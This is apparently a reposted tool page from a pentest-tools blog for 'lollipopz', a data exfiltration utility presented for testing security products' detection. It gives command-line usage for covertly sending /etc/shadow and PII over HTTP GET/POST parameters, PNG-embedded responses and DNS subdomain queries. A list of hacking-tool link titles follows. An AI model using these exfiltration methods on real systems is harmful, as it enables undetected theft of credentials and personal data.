Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.
Exfiltration How-To
/etc/shadow -> HTTP GET requests
Server
# ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETServer -lp 80 -o output.logClient
$ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r/etc/shadow -> HTTP POST requests
Server
# ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTServer -lp 80 -o output.logClient
$ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -rPII -> PNG embedded in HTTP Response
Server
$ ./lollipopz-cli.py -m lollipopz.methods.http.image_response.Server -lp 37650 -o output.logClient
# ./lollipopz-cli.py -m lollipopz.methods.http.image_response.Client -rh 127.0.0.1 -rp 37650 -lp 80 -i ./samples/pii.txt -rPII -> DNS subdomains querying
Server
# ./lollipopz-cli.py -m lollipopz.methods.dns.subdomain_cipher.Server -lp 53 -o output.logClient
$ ./lollipopz-cli.py -m lollipopz.methods.dns.subdomain_cipher.Client -rh 127.0.0.1 -rp 53 -i ./samples/pii.txt -rvia KitPloit
Related posts
- Usb Pentest Tools
- Hak5 Tools
- Pentest Tools Find Subdomains
- Hack Tools For Mac
- Pentest Tools Tcp Port Scanner
- Pentest Tools Apk
- Hack App
- Hacker Hardware Tools
- World No 1 Hacker Software
- Hack Tools Online
- Pentest Tools Website Vulnerability
- Hacking Tools For Beginners
- Hack Tools Github
- Pentest Tools List
- Pentest Tools Android
- How To Install Pentest Tools In Ubuntu
- Pentest Tools Bluekeep
- Hack Tools Online
- Hacking Tools Github
- Hacker Techniques Tools And Incident Handling
- Nsa Hack Tools Download
- Hack Tools Online
- Hacker Tool Kit
- Pentest Tools Port Scanner
- Hacker Tools Free
- Hack Tools For Mac
No comments:
Post a Comment